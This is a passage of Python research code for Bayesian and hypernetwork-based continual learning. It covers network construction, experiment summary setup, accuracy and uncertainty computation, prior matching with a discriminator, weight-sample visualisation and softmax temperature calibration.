mnet_kwargs['cutout_mod'] = True
mnet = sutils.get_mnet_model(config, mnet_type, in_shape, out_shape,
device, no_weights=no_mnet_weights,
**mnet_kwargs)
# Initialize main net weights, if any.
assert not hasattr(config, 'custom_network_init')
if hasattr(config, 'normal_init'):
mnet.custom_init(normal_init=config.normal_init,
normal_std=config.std_normal_init, zero_bias=True)
else:
mnet.custom_init(zero_bias=True)
#####################
### Discriminator ###
#####################
dis = None
if use_dis and create_dis:
logger.info('Creating discriminator ...')
if config.use_batchstats:
in_shape = [mnet.num_params * 2]
else:
in_shape = [mnet.num_params]
dis = sutils.get_mnet_model(config, config.dis_net_type, in_shape, [1],
device, cprefix='dis_', no_weights=False)
dis.custom_init(normal_init=config.normal_init,
normal_std=config.std_normal_init, zero_bias=True)
#####################
### Hypernetwork ###
#####################
def _hyperfan_init(net, mnet, cond_var, uncond_var):
if isinstance(net, HMLP):
net.apply_hyperfan_init(method='in', use_xavier=False,
uncond_var=uncond_var, cond_var=cond_var,
mnet=mnet)
elif isinstance(net, ChunkedHMLP):
net.apply_chunked_hyperfan_init(method='in', use_xavier=False,
uncond_var=uncond_var, cond_var=cond_var, mnet=mnet, eps=1e-5,
cemb_normal_init=False)
elif isinstance(net, StructuredHMLP):
# FIXME We should adapt `uncond_var`, as chunk embeddings are
# additionally inputted as unconditional inputs.
# FIXME We should provide further instructions on what individual
# chunks represent (e.g., batchnorm scales and shifts should be
# initialized differently).
for int_hnet in net.internal_hnets:
net.apply_hyperfan_init(method='in', use_xavier=False,
uncond_var=uncond_var, cond_var=cond_var, mnet=None)
else:
raise NotImplementedError('No hyperfan-init implemented for ' +
'hypernetwork of type %s.' % type(net))
hnet = None
if use_hnet and create_hnet:
logger.info('Creating hypernetwork ...')
# For now, we either produce all or no weights with the hypernet.
# Note, it can be that the mnet was produced with internal weights.
assert mnet.hyper_shapes_learned is None or \
len(mnet.param_shapes) == len(mnet.hyper_shapes_learned)
chunk_shapes = None
num_per_chunk = None
assembly_fct = None
if config.imp_hnet_type == 'structured_hmlp':
if mnet_type == 'resnet':
chunk_shapes, num_per_chunk, assembly_fct = \
resnet_chunking(mnet,
gcd_chunking=config.imp_shmlp_gcd_chunking)
elif mnet_type == 'wrn':
chunk_shapes, num_per_chunk, assembly_fct = \
wrn_chunking(mnet,
gcd_chunking=config.imp_shmlp_gcd_chunking,
ignore_bn_weights=False, ignore_out_weights=False)
else:
raise NotImplementedError('"structured_hmlp" not implemented ' +
'for network of type %s.' % mnet_type)
# The hypernet is an implicit distribution, that only receives noise
# as input, which are unconditional inputs.
hnet = sutils.get_hypernet(config, device, config.imp_hnet_type,
mnet.param_shapes, 0, cprefix='imp_',
no_uncond_weights=no_hnet_weights, no_cond_weights=True,
uncond_in_size=config.latent_dim, shmlp_chunk_shapes=chunk_shapes,
shmlp_num_per_chunk=num_per_chunk, shmlp_assembly_fct=assembly_fct)
#if isinstance(hnet, StructuredHMLP):
# print(num_per_chunk)
# for ii, int_hnet in enumerate(hnet.internal_hnets):
# print(' Internal hnet %d with %d outputs.' % \
# (ii, int_hnet.num_outputs))
### Initialize hypernetwork.
if not no_hnet_weights:
if not config.hyper_fan_init:
rtu.apply_custom_hnet_init(config, logger, hnet)
else:
_hyperfan_init(hnet, mnet, -1, config.latent_std**2)
### Apply noise trick if requested by user.
if config.full_support_perturbation != -1:
hnet = HPerturbWrapper(hnet, hnet_uncond_in_size=config.latent_dim,
sigma_noise=config.full_support_perturbation)
shared.noise_dim = hnet.num_outputs
else:
shared.noise_dim = config.latent_dim
##########################
### Hyper-hypernetwork ###
##########################
hhnet = None
if use_hhnet and create_hhnet:
if not create_hnet:
# FIXME We require an existing hnet to do this.
raise NotImplementedError('This function doesn\'t allow yet the ' +
'creation of a hyper-hypernet without ' +
'first creating a hypernetwork.')
logger.info('Creating hyper-hypernetwork ...')
assert hnet is not None
assert len(hnet.unconditional_param_shapes) == len(hnet.param_shapes)
hhnet = sutils.get_hypernet(config, device, config.hh_hnet_type,
hnet.unconditional_param_shapes, num_tasks,
cprefix='hh_')
### Initialize hypernetwork.
if not config.hyper_fan_init:
rtu.apply_custom_hnet_init(config, logger, hhnet)
else:
# Note, hyperfan-init doesn't take care of task-embedding
# intialization.
init_conditional_embeddings(hhnet,
normal_std=config.std_normal_temb)
_hyperfan_init(hhnet, hnet, config.std_normal_temb**2, -1)
return mnet, hnet, hhnet, dis
def setup_summary_dict(config, shared, experiment, mnet, hnet=None,
hhnet=None, dis=None):
"""Setup the summary dictionary that is written to the performance
summary file (in the result folder).
This method adds the keyword "summary" to ``shared``.
Args:
config (argparse.Namespace): Command-line arguments.
shared (argparse.Namespace): Miscellaneous data shared among training
functions (summary dict will be added).
experiment: Type of experiment. See argument `experiment` of method
:func:`probabilistic.prob_cifar.train_avb.run`.
mnet: Main network.
hnet (optional): Implicit Hypernetwork.
hhnet (optional): Hyper-Hypernetwork.
dis (optional): Discriminator.
"""
assert experiment in ['gmm_bbb', 'gmm_avb', 'gmm_avb_pf',
'split_bbb', 'perm_bbb',
'cifar_zenke_bbb', 'cifar_resnet_bbb',
'split_mnist_avb', 'split_mnist_avb_pf',
'perm_mnist_avb', 'perm_mnist_avb_pf',
'cifar_zenke_avb', 'cifar_zenke_avb_pf',
'cifar_resnet_avb', 'cifar_resnet_avb_pf',
'gmm_ssge', 'gmm_ssge_pf',
'split_mnist_ssge', 'split_mnist_ssge_pf',
'perm_mnist_ssge', 'perm_mnist_ssge_pf',
'cifar_resnet_ssge', 'cifar_resnet_ssge_pf',
'gmm_ewc', 'split_mnist_ewc', 'perm_mnist_ewc',
'cifar_resnet_ewc',
'gmm_mt', 'split_mnist_mt', 'perm_mnist_mt',
'cifar_resnet_mt']
summary = dict()
mnum = mnet.num_params
hnum = -1
hhnum = -1
dnum = -1
hm_ratio = -1
hhm_ratio = -1
dm_ratio = -1
if hnet is not None:
hnum = hnet.num_params
hm_ratio = hnum / mnum
if hhnet is not None:
hhnum = hhnet.num_params
hhm_ratio = hhnum / mnum
if dis is not None:
dnum = dis.num_params
dm_ratio = dnum / mnum
if experiment == 'gmm_bbb':
summary_keys = hpgmmbbb._SUMMARY_KEYWORDS
elif experiment == 'split_bbb':
summary_keys = hpsplitbbb._SUMMARY_KEYWORDS
elif experiment == 'perm_bbb':
summary_keys = hppermbbb._SUMMARY_KEYWORDS
elif experiment == 'cifar_zenke_bbb':
summary_keys = hpzenkebbb._SUMMARY_KEYWORDS
elif experiment == 'cifar_resnet_bbb':
summary_keys = hpresnetbbb._SUMMARY_KEYWORDS
elif experiment == 'gmm_avb':
summary_keys = hpgmmavb._SUMMARY_KEYWORDS
elif experiment == 'gmm_avb_pf':
summary_keys = hpgmmavbpf._SUMMARY_KEYWORDS
elif experiment == 'split_mnist_avb':
summary_keys = hpsplitavb._SUMMARY_KEYWORDS
elif experiment == 'split_mnist_avb_pf':
summary_keys = hpsplitavbpf._SUMMARY_KEYWORDS
elif experiment == 'perm_mnist_avb':
summary_keys = hppermavb._SUMMARY_KEYWORDS
elif experiment == 'perm_mnist_avb_pf':
summary_keys = hppermavbpf._SUMMARY_KEYWORDS
elif experiment == 'cifar_resnet_avb':
summary_keys = hpresnetavb._SUMMARY_KEYWORDS
elif experiment == 'cifar_resnet_avb_pf':
summary_keys = hpresnetavbpf._SUMMARY_KEYWORDS
elif experiment == 'cifar_zenke_avb':
summary_keys = hpzenkeavb._SUMMARY_KEYWORDS
elif experiment == 'gmm_ssge':
summary_keys = hpgmmssge._SUMMARY_KEYWORDS
elif experiment == 'gmm_ssge_pf':
summary_keys = hpgmmssgepf._SUMMARY_KEYWORDS
elif experiment == 'split_mnist_ssge':
summary_keys = hpsplitssge._SUMMARY_KEYWORDS
elif experiment == 'split_mnist_ssge_pf':
summary_keys = hpsplitssgepf._SUMMARY_KEYWORDS
elif experiment == 'perm_mnist_ssge':
summary_keys = hpsplitssgepf._SUMMARY_KEYWORDS
elif experiment == 'perm_mnist_ssge_pf':
summary_keys = hpsplitssgepf._SUMMARY_KEYWORDS
elif experiment == 'cifar_resnet_ssge':
summary_keys = hpresnetssge._SUMMARY_KEYWORDS
elif experiment == 'cifar_resnet_ssge_pf':
summary_keys = hpresnetssgepf._SUMMARY_KEYWORDS
elif experiment == 'cifar_zenke_avb_pf':
summary_keys = hpzenkeavbpf._SUMMARY_KEYWORDS
elif experiment == 'gmm_ewc':
summary_keys = hpgmmewc._SUMMARY_KEYWORDS
elif experiment == 'split_mnist_ewc':
summary_keys = hpsplitewc._SUMMARY_KEYWORDS
elif experiment == 'perm_mnist_ewc':
summary_keys = hppermewc._SUMMARY_KEYWORDS
elif experiment == 'cifar_resnet_ewc':
summary_keys = hpresnetewc._SUMMARY_KEYWORDS
elif experiment == 'gmm_mt':
summary_keys = hpgmmmt._SUMMARY_KEYWORDS
elif experiment == 'split_mnist_mt':
summary_keys = hpsplitmt._SUMMARY_KEYWORDS
elif experiment == 'perm_mnist_mt':
summary_keys = hppermmt._SUMMARY_KEYWORDS
else:
assert experiment == 'cifar_resnet_mt'
summary_keys = hpresnetmt._SUMMARY_KEYWORDS
for k in summary_keys:
if k == 'acc_task_given' or \
k == 'acc_task_given_during' or \
k == 'acc_task_inferred_ent' or \
k == 'acc_task_inferred_ent_during' or \
k == 'acc_dis':
summary[k] = [-1] * config.num_tasks
elif k == 'acc_avg_final' or \
k == 'acc_avg_during' or \
k == 'acc_avg_task_given' or \
k == 'acc_avg_task_given_during' or \
k == 'acc_avg_task_inferred_ent' or \
k == 'acc_avg_task_inferred_ent_during' or \
k == 'avg_task_inference_acc_ent' or \
k == 'acc_avg_task_inferred_conf' or \
k == 'avg_task_inference_acc_conf' or \
k == 'acc_avg_task_inferred_agree' or \
k == 'avg_task_inference_acc_agree' or \
k == 'acc_avg_dis':
summary[k] = -1
elif k == 'num_weights_main':
summary[k] = mnum
elif k == 'num_weights_hyper':
summary[k] = hnum
elif k == 'num_weights_hyper_hyper':
summary[k] = hhnum
elif k == 'num_weights_dis':
summary[k] = dnum
elif k == 'num_weights_hm_ratio':
summary[k] = hm_ratio
elif k == 'num_weights_hhm_ratio':
summary[k] = hhm_ratio
elif k == 'num_weights_dm_ratio':
summary[k] = dm_ratio
elif k == 'finished':
summary[k] = 0
else:
# Implementation must have changed if this exception is
# raised.
raise ValueError('Summary argument %s unknown!' % k)
shared.summary = summary
def set_train_mode(training, mnet, hnet, hhnet, dis):
"""Set mode of all given networks.
Note, all networks be passed as ``None`` and only the provided networks
its mode is set.
Args:
training (bool): If ``True``, training mode will be activated.
Otherwise, evaluation mode is activated.
(....): The remaining arguments refer to network instances.
"""
for net in [mnet, hnet, hhnet, dis]:
if net is not None:
if training:
net.train()
else:
net.eval()
def compute_acc(task_id, data, mnet, hnet, hhnet, device, config, shared,
split_type='test', return_dataset=False, return_entropies=False,
return_confidence=False, return_agreement=False,
return_pred_labels=False, return_labels=False,
return_samples=False, deterministic_sampling=False,
in_samples=None, out_samples=None, num_w_samples=None,
w_samples=None):
"""Compute the accuracy over a specified dataset split.
Note, this function does not explicitly execute the code within a
``torch.no_grad()`` context. This needs to be handled from the outside if
desired.
Note, this function serves the same purpose as function
:func:`probabilistic.prob_mnist.train_utils.compute_acc`.
The ``task_id`` is used only to select the task embedding (if ``hhnet``
is given) and the correct output units depending on the CL scenario.
Args:
(....): See docstring of function
:func:`probabilistic.prob_mnist.train_utils.compute_acc`.
return_samples: If ``True``, the attribute ``samples`` will be
added to the ``return_vals`` Namespace (see return values). This
field will contain all weight samples that have been drawn from
the hypernetwork ``hnet``. If ``hnet`` is not provided,
this field will be ``None``. The field will be filled with a
numpy array.
Returns:
(tuple): Tuple containing:
- **accuracy**: Overall accuracy on dataset split.
- **return_vals**: A namespace object that contains several attributes,
depending on the arguments passed. It will allways contain the
following attribute, denoting the current weights of the implicit
distribution.
- ``theta``: The current output of the ``hhnet`` for ``task_id``.
If no ``hhnet`` is provided but an ``hnet`` is given,
then its weights ``theta`` will be provided. It will be
``None`` if only a main network ``mnet`` is provided.
"""
# FIXME The code is almost a perfect copy from the original function.
assert in_samples is not None or split_type in ['test', 'val', 'train']
assert out_samples is None or in_samples is not None
generator = None
if deterministic_sampling:
generator = torch.Generator()#device=device)
# Note, PyTorch recommends using large random seeds:
# https://tinyurl.com/yx7fwrry
generator.manual_seed(2147483647)
return_vals = Namespace()
allowed_outputs = pmutils.out_units_of_task(config, data, task_id,
shared.num_trained)
ST = shared.softmax_temp[task_id]
if not config.calibrate_temp:
assert ST == 1.
if in_samples is not None:
X = in_samples
T = out_samples
elif split_type == 'train':
X = data.get_train_inputs()
T = data.get_train_outputs()
elif split_type == 'test' or data.num_val_samples == 0:
X = data.get_test_inputs()
T = data.get_test_outputs()
else:
X = data.get_val_inputs()
T = data.get_val_outputs()
num_samples = X.shape[0]
if T is not None:
T = pmutils.fit_targets_to_softmax(config, shared, device, data,
task_id, T)
if return_dataset:
return_vals.inputs = X
return_vals.targets = T
labels = None
if T is not None:
labels = np.argmax(T, axis=1)
if return_labels:
return_vals.labels = labels
X = data.input_to_torch_tensor(X, device)
#if T is not None:
# T = data.output_to_torch_tensor(T, device)
hnet_theta = None
return_vals.theta = None
if hhnet is not None:
assert hnet is not None
hnet_theta = hhnet.forward(cond_id=task_id)
return_vals.theta = hnet_theta
elif hnet is not None:
return_vals.theta = hnet.unconditional_params
# There is no weight sampling without an implicit hypernetwork.
if w_samples is not None:
num_w_samples = len(w_samples)
elif num_w_samples is None:
num_w_samples = 1 if hnet is None else config.val_sample_size
else:
if hnet is None and num_w_samples > 1:
warn('Cannot draw multiple weight samples for deterministic ' +
'network')
num_w_samples = 1
if hasattr(config, 'non_growing_sf_cl3') and config.cl_scenario == 3 \
and config.non_growing_sf_cl3:
softmax_width = config.num_tasks * data.num_classes
elif config.cl_scenario == 3 and not config.split_head_cl3:
softmax_width = len(allowed_outputs)
else:
softmax_width = data.num_classes
softmax_outputs = np.empty((num_w_samples, X.shape[0], softmax_width))
if return_samples:
return_vals.samples = None
# FIXME Note, that a continually learned hypernet (whose weights come from a
# hyper-hypernet) would in principle also require correct argument passing,
# e.g., to choose the correct set of batch statistics.
kwargs = pmutils.mnet_kwargs(config, task_id, mnet)
for j in range(num_w_samples):
weights = None
if w_samples is not None:
weights = w_samples[j]
elif hnet is not None:
z = torch.normal(torch.zeros(1, shared.noise_dim),
config.latent_std, generator=generator).to(device)
weights = hnet.forward(uncond_input=z, weights=hnet_theta)
if weights is not None and return_samples:
if j == 0:
return_vals.samples = np.empty((num_w_samples,
hnet.num_outputs))
return_vals.samples[j, :] = torch.cat([p.detach().flatten() \
for p in weights]).cpu().numpy()
curr_bs = config.val_batch_size
n_processed = 0
while n_processed < num_samples:
if n_processed + curr_bs > num_samples:
curr_bs = num_samples - n_processed
n_processed += curr_bs
sind = n_processed - curr_bs
eind = n_processed
Y = mnet.forward(X[sind:eind, :], weights=weights, **kwargs)
if allowed_outputs is not None:
Y = Y[:, allowed_outputs]
softmax_outputs[j, sind:eind, :] = F.softmax(Y / ST, dim=1). \
detach().cpu().numpy()
# Predictive distribution per sample.
pred_dists = softmax_outputs.mean(axis=0)
pred_labels = np.argmax(pred_dists, axis=1)
# Note, that for CL3 (without split heads) `labels` are already absolute,
# not relative to the head (see post-processing of targets `T` above).
if labels is not None:
accuracy = 100. * np.sum(pred_labels == labels) / num_samples
else:
accuracy = None
if return_pred_labels:
assert pred_labels.size == X.shape[0]
return_vals.pred_labels = pred_labels
if return_entropies:
# We use the "maximum" trick to improve numerical stability.
return_vals.entropies = - np.sum(pred_dists * \
np.log(np.maximum(pred_dists, 1e-5)),
axis=1)
# return_vals.entropies = - np.sum(pred_dists * np.log(pred_dists),
# axis=1)
assert return_vals.entropies.size == X.shape[0]
# Normalize by maximum entropy.
max_ent = - np.log(1.0 / data.num_classes)
return_vals.entropies /= max_ent
if return_confidence:
return_vals.confidence = np.max(pred_dists, axis=1)
assert return_vals.confidence.size == X.shape[0]
if return_agreement:
return_vals.agreement = softmax_outputs.std(axis=0).mean(axis=1)
assert return_vals.agreement.size == X.shape[0]
return accuracy, return_vals
def estimate_implicit_moments(config, shared, task_id, hnet, hhnet, num_samples,
device):
"""Estimate the first two moments of an implicit distribution.
This function takes the implicit distribution represented by ``hnet`` and
estimates the mean and the variances of its outputs.
Args:
config (argparse.Namespace): Command-line arguments.
shared (argparse.Namespace): Miscellaneous data shared among training
functions.
task_id (int): In case ``hhnet`` is provided, this will be used to
select the task embedding.
hnet: The hypernetwork.
hhnet: The hyper-hypernetwork, may be ``None``.
num_samples: The number of samples that should be drawn from the
``hnet`` to estimate the statistics.
device: The PyTorch device.
Returns:
(tuple): Tuple containing:
- **sample_mean** (torch.Tensor): Estimated mean of the implicit
distribution.
- **sample_std** (torch.Tensor): Estimated standard deviation of the
implicit distribution.
"""
theta = None
if hhnet is not None:
theta = hhnet.forward(cond_id=task_id)
samples = torch.empty((num_samples, hnet.num_outputs)).to(device)
for j in range(num_samples):
z = torch.normal(torch.zeros(1, shared.noise_dim), config.latent_std).\
to(device)
weights = hnet.forward(uncond_input=z, weights=theta)
samples[j, :] = torch.cat([p.detach().flatten() for p in weights])
sample_mean = samples.mean(dim=0)
sample_std = samples.std(dim=0)
return sample_mean, sample_std
def process_dis_batch(config, shared, batch_size, device, dis, hnet, hnet_theta,
dist=None):
"""Process a batch of weight samples via the discriminator.
Args:
config (argparse.Namespace): Command-line arguments.
shared (argparse.Namespace): Miscellaneous data shared among training
functions.
batch_size (int): How many samples should be fed through the
discriminator.
device: PyTorch device.
dis: Discriminator.
hnet: The hypernetwork, representing an implicit distribution from
which to sample weights. Is only used to draw samples if
``dist`` is ``None``.
hnet_theta: The weights passed to ``hnet`` when drawing samples.
dist (torch.distributions.normal.Normal): A normal distribution,
from which discriminator inputs can be sampled.
Returns:
(tuple): Tuple containing:
- **dis_out** (torch.Tensor): The discriminator output for the given
batch of samples.
- **dis_input** (torch.Tensor): The samples that have been passed
through the discriminator.
"""
if dist is not None:
samples = dist.sample([batch_size])
if hnet is not None:
assert np.all(np.equal(samples.shape,
[batch_size, hnet.num_outputs]))
else:
assert hnet is not None
z = torch.normal(torch.zeros(batch_size, shared.noise_dim),
config.latent_std).to(device)
samples = hnet.forward(uncond_input=z, weights=hnet_theta,
ret_format='flattened')
if config.use_batchstats:
samples = gan.concat_mean_stats(samples)
return dis.forward(samples), samples
def calc_prior_matching(config, shared, batch_size, device, dis, hnet,
theta_current, dist_prior, dist_ac,
return_current_samples=False):
"""Calculate the prior-matching term.
Args:
config (argparse.Namespace): Command-line arguments.
shared (argparse.Namespace): Miscellaneous data shared among training
functions.
batch_size (int): How many samples should be fed through the
discriminator.
device: PyTorch device.
dis: Discriminator.
hnet: The hypernetwork, representing an implicit distribution from
which to sample weights. Is used to draw samples from the current
implicit distribution ``theta_current`` (which may be ``None`` if
internal weights should be selected).
theta_current: The weights passed to ``hnet`` when drawing samples from
the current implicit distribution that should be matched to the
prior (can be ``None`` if internally maintaned weights of ``hnet``
should be used).
dist_prior (torch.distributions.normal.Normal): A normal distribution,
that represents an explicit prior. Only used if ``dist_ac`` is
not ``None``.
dist_ac (torch.distributions.normal.Normal): A normal distribution,
that can be passed if the adaptive contrast trick is used. If not
``None``, then ``dist_prior`` may not be ``None``.
return_current_samples (bool): If ``True``, the samples collected from
the current implicit distribution are returned.
Returns:
(tuple): Tuple containing:
- **loss_pm**: (torch.Tensor): The unscaled loss value for the
prior-matching term.
- **curr_samples** (list): List of samples drawn from the implicit
distribution ``hnet`` (using ``theta_current``).
"""
assert dist_ac is None or dist_prior is not None
# The following two terms are only required if AC is used.
log_prob_ac = 0
log_prob_prior = 0
if return_current_samples:
curr_samples = []
else:
curr_samples = None
# Translate into samples from the current implicit distribution.
w_samples = torch.empty((batch_size, hnet.num_outputs)).to(device)
# FIXME Create batch of samples rather than looping.
for j in range(batch_size):
z = torch.normal(torch.zeros(1, shared.noise_dim), config.latent_std).\
to(device)
weights = hnet.forward(uncond_input=z, weights=theta_current)
w_samples[j, :] = torch.cat([p.flatten() for p in weights])
if return_current_samples:
curr_samples.append(weights)
if dist_ac is not None:
log_prob_ac = dist_ac.log_prob(w_samples).sum(dim=1).mean()
log_prob_prior = dist_prior.log_prob(w_samples).sum(dim=1).mean()
if config.use_batchstats:
w_samples = gan.concat_mean_stats(w_samples)
value_t = dis.forward(w_samples).mean()
return value_t + log_prob_ac - log_prob_prior, curr_samples
def calc_batch_uncertainty(config, shared, task_id, device, inputs, mnet, hnet,
hhnet, data, num_w_samples, hnet_theta=None,
allowed_outputs=None):
"""Compute the per-sample uncertainties for a given batch of inputs.
Note:
This function is executed inside a ``torch.no_grad()`` context.
Args:
config (argparse.Namespace): Command-line arguments.
shared: Miscellaneous data shared among training functions (softmax
temperature is stored in here).
task_id (int): In case a hypernet ``hnet`` is given, the ``task_id`` is
used to load the corresponding main network ``mnet`` weights.
device: PyTorch device.
inputs (torch.Tensor): A batch of main network ``mnet`` inputs.
mnet: The main network.
hnet (optional): The implicit hypernetwork, can be ``None``.
hhnet (optional): The hyper-hypernetwork, can be ``None``.
data: Dataset loader. Needed to determine the number of classes.
num_w_samples (int): The number of weight samples that should be drawn
to estimate predictive uncertainty.
hnet_theta (tuple, optional): To save computation, one can pass
weights for the implicit hypernetwork ``hnet``, if they have been
computed prior to calling this methods.
allowed_outputs (tuple, optional): The indices of the neurons belonging
to outputs head ``task_id``. Only needs to be specified in a
multi-head setting.
Returns:
(numpy.ndarray): The entropy of the estimated predictive distribution
per input sample.
"""
assert data.classification
assert config.cl_scenario == 2 or allowed_outputs is not None
assert hhnet is None or hnet is not None
# FIXME We calibrate the temperature after training on a task. This function
# is currently only used to track batch uncertainty during training or
# choose coreset samples that have maximum uncertainty on a single model
# (note, relative order of uncertain samples doesn't change due to
# calibration for a single model). Hence, the function is invoked before
# the temperature is optimized.
# Therefore, I throw an assertion if we use the function in the future for
# other purposes, just in case the programmer is unaware.
assert shared.softmax_temp[task_id] == 1.
ST = shared.softmax_temp[task_id]
with torch.no_grad():
if hnet_theta is None and hhnet is not None:
hnet_theta = hhnet.forward(cond_id=task_id)
if allowed_outputs is not None:
num_outs = len(allowed_outputs)
else:
num_outs = data.num_classes
softmax_outputs = np.empty((num_w_samples, inputs.shape[0], num_outs))
kwargs = pmutils.mnet_kwargs(config, task_id, mnet)
for j in range(num_w_samples):
weights = None
if hnet is not None:
z = torch.normal(torch.zeros(1, shared.noise_dim),
config.latent_std).to(device)
weights = hnet.forward(uncond_input=z, weights=hnet_theta)
Y = mnet.forward(inputs, weights=weights, **kwargs)
if allowed_outputs is not None:
Y = Y[:, allowed_outputs]
softmax_outputs[j, :, :] = F.softmax(Y / ST, dim=1).detach(). \
cpu().numpy()
# Predictive distribution per sample.
pred_dists = softmax_outputs.mean(axis=0)
# We use the "maximum" trick to improve numerical stability.
entropies = - np.sum(pred_dists * np.log(np.maximum(pred_dists, 1e-5)),
axis=1)
assert entropies.size == inputs.shape[0]
# Normalize by maximum entropy.
max_ent = - np.log(1.0 / data.num_classes)
return entropies / max_ent
def visualize_implicit_dist(config, task_id, writer, train_iter, w_samples,
figsize=(10, 6)):
"""Visualize an implicit distribution.
TODO
"""
assert w_samples.ndim == 2
num_weights = w_samples.shape[1]
# Ensure that we always plot the same samples, independent of the simulation
# its random seed.
rand = np.random.RandomState(42)
weight_inds = rand.choice(np.arange(num_weights), min(10, num_weights),
replace=False)
weight_inds = np.sort(weight_inds)
weight_samples = dict(('Weight %d' % (weight_inds[i]),
w_samples[:, weight_inds[i]].detach().cpu().numpy()) \
for i in range(len(weight_inds)))
# FIXME Adapt our plotting guidelines.
df = pd.DataFrame.from_dict(weight_samples)
# correlation matrix.
plt.rcParams['figure.figsize'] = figsize
plt.matshow(df.corr(method='pearson'), vmin=-1, vmax=1)
plt.xticks(range(len(df.columns)), df.columns)
plt.xticks(rotation=70)
plt.yticks(range(len(df.columns)), df.columns)
plt.colorbar()
writer.add_figure('eval/task_%d/correlation' % task_id, plt.gcf(),
train_iter, close=True)
n = 0
for p in weight_inds:
for q in weight_inds:
if q >= p:
break
# Avoid that plots get corrupted due to mode collapse.
if np.isclose(weight_samples['Weight %d' % p].std(), 0) or \
np.isclose(weight_samples['Weight %d' % q].std(), 0):
n += 1
warn('Could not create plot "eval/task_%d/weight_%d_%d" ' \
% (task_id, p, q) + 'due to mode collapsed posterior ' +
'variance.')
continue
try:
sns.jointplot(x='Weight %d' % (p), y='Weight %d' % (q), data=df,
kind="kde")
writer.add_figure('eval/task_%d/weight_%d_%d' % (task_id, p, q),
plt.gcf(), train_iter, close=True)
except:
warn('Could not visualize joint weight density.')
n += 1
if n > 9:
break
if n > 9:
break
def calibrate_temperature(task_id, data, mnet, hnet, hhnet, device, config,
shared, logger, writer, cal_per_model=False,
only_correctly_classified=False,
cal_target_entropy=-1):
"""Calibrate softmax temperature for current task.
When training in a continual learning setting, the loss is a combination
of task-specific terms and regularizers (which are different for every
task). These differences in the loss functions used for training will have
an influence on the (in-distribution) softmax outputs.
To overcome these differences, we perform a post-hoc calibration step
using a proper score function (the negative-log likelihood, which is
identical to the cross-entropy when using 1-hot targets) to learn the
softmax temperature. Note, high softmax temperatures increase entropy,
whereas low temperatures increase confidence.
A proper calibration of each task will ensure that between task comparisons
become easier.
Note:
We calibrate on the training set, as we want our in-distribution
predictive distributions to be properly calibrated for each task (note,
tasks are trained using different loss functions since there are
different regularizers that kick in over time). The only purpose of this
function is to correct this behavior.
Args:
(....): See docstring of function :func:`train`.
cal_per_model (bool): By default, we calibrate the predictive
distriubtion, i.e., the averaged softmax across all models from the
Bayesian ensemble (depending on ``config.cal_sample_size``). If
instead we should calibrate individual models from this ensemble,
this option can be set to ``True`` (note, behavior is the same if
``config.cal_sample_size == 1``).
only_correctly_classified (bool): Only use correctly classified samples
for the calibration (as determined by the argmax of the predictive
distribution).
cal_target_entropy (float): If not ``-1``, then instead of calibrating
using a proper score function, we learn a temperature such that a
given target in-distribution entropy is matched (i.e., we compute
the entropy on a mini-batch and minimize the MSE towards the given
target entropy). In this way, one can ensure actively that all tasks
have the same in-distribution entropy.
"""
logger.info('Temperature calibration for task %d ...' % (task_id+1))
# FIXME We could also follow the code from
# https://github.com/gpleiss/temperature_scaling/blob/master/temperature_scaling.py
# but they don't consider BNNs. Note, there code is much more efficient
# since they compute the logits before entering the training loop (which
# is possible when only having one model). Though, in general, we have
# multiple models.
set_train_mode(True, mnet, hnet, hhnet, None)
gauss_main = False
if isinstance(mnet, GaussianBNNWrapper):
gauss_main = True
# Whether the hypernet represents an implicit distribution (i.e., it's
# input is a random variable), or whether it has task embeddings as input.
det_hnet = False
if hnet is not None:
if hnet.num_known_conds > 0:
assert hhnet is None
det_hnet = True
# Can currently only be the case if we train a BbB setup with option
# `mean_only` enabled.
if not gauss_main:
assert hasattr(config, 'mean_only') and config.mean_only
# The single parameter to be tuned by this method.
temp_param = torch.nn.Parameter(shared.softmax_temp[task_id],
requires_grad=True)
assert temp_param == 1.
# Which temperature transfer function to use during training. Note, this
# can ensure that temperatures don't become negative.
# ttf = temperature transfer function
ttf_choice = 'softplus'
if ttf_choice == 'linear':
ttf = lambda x : x
#torch.nn.init.ones_(temp_param.data)
elif ttf_choice == 'exp':
ttf = torch.exp
torch.nn.init.zeros_(temp_param.data)
else:
ttf = F.softplus
temp_param.data = torch.log(torch.exp(torch.ones(1)) - \
torch.ones(1)).to(device)
allowed_outputs = pmutils.out_units_of_task(config, data, task_id,
config.num_tasks)
optimizer = tutils.get_optimizer([temp_param], config.lr,
momentum=config.momentum, weight_decay=config.weight_decay,
use_adam=config.use_adam, adam_beta1=config.adam_beta1,
use_rmsprop=config.use_rmsprop, use_adadelta=config.use_adadelta,
use_adagrad=config.use_adagrad)
mnet_kwargs = pmutils.mnet_kwargs(config, task_id, mnet)
num_w_samples = config.train_sample_size if config.cal_sample_size == -1 \
else config.cal_sample_size
with torch.no_grad():
# We don't change any network parameters, so these calls produce
# constant outputs.
theta_current = None
if hhnet is not None:
theta_current = hhnet.forward(cond_id=task_id)
theta_current = [p.detach() for p in theta_current]
if gauss_main:
assert hhnet is None
if hnet is not None:
hnet_out = hnet.forward(cond_id=task_id)
else:
hnet_out = None
w_mean, w_rho = mnet.extract_mean_and_rho(weights=hnet_out)
w_std = putils.decode_diag_gauss(w_rho,
logvar_enc=mnet.logvar_encoding)
elif det_hnet:
w_mean = hnet.forward(cond_id=task_id)
### We first compute the logit outputs over all samples for all models,
### since they don't change anymore.
# FIXME Could lead to memory issues for large datasets and might not be
# inefficient if ``config.cal_temp_iter`` is small, since we won't
# iterate over the whole dataset.
inputs = data.get_train_inputs()
targets = data.get_train_outputs()
T = data.output_to_torch_tensor(targets, device, mode='train')
# Modify 1-hot encodings according to CL scenario.
assert T.shape[1] == data.num_classes
# In CL1, CL2 and CL3 (with seperate heads) we do not have to modify the
# targets.
if config.cl_scenario == 3 and not config.split_head_cl3:
raise NotImplementedError('Temperature calibration not ' +
'implemented for CL3 without split-head.')
_, labels = torch.max(T, 1) # Integer labels.
#labels = labels.detach()
num_samples = inputs.shape[0]
logit_outputs = torch.empty((num_w_samples, num_samples, T.shape[1])). \
to(device)
for j in range(num_w_samples):
if gauss_main: # Gaussian weight posterior.
# In case of the local-reparam trick, we anyway have a different
# weight per sample. So, the demand of having the same model for
# all samples in the dataset drops.
if config.local_reparam_trick:
# Note, the sampling will happen inside the forward method.
weights = None
emean = w_mean
erho = w_rho
else:
weights = putils.sample_diag_gauss(w_mean, w_std,
is_radial=config.radial_bnn)
emean = None
erho = None
elif det_hnet:
weights = w_mean
else:
if hnet is not None: # Implicit hypernetwork.
